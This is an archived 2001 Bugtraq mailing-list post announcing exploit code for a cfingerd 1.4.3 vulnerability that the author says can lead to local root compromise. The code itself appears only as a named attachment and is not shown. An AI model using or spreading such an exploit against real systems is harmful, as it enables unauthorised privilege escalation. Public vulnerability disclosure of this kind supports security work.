
Exploit for cfingerd 1.4.3 and prior


Date: Wed, 11 Jul 2001 09:24:42 +0200 (CEST)
From: qitest1 <qitest1@cercaband.com>
To: bugtraq@securityfocus.com
Subject: Exploit for cfingerd 1.4.3 and prior



hi,

this is a simple code for exploiting the cfingerd 1.4.3 and prior vuln
recently posted by Steven Van Acker <deepstar@ulyssis.org>, 
which may lead to a local root compromise. Read the comments in the code 
for more detailed info.

bye

-- 
/* qitest1		http://qitest1.cjb.net *
 *    ``Ut tensio, sic vis. 69 tecum sis.''    *
 * main(){if(unsatisfied == 69) try_come(in);} */

[Attachment: cfingerd0x69.c]
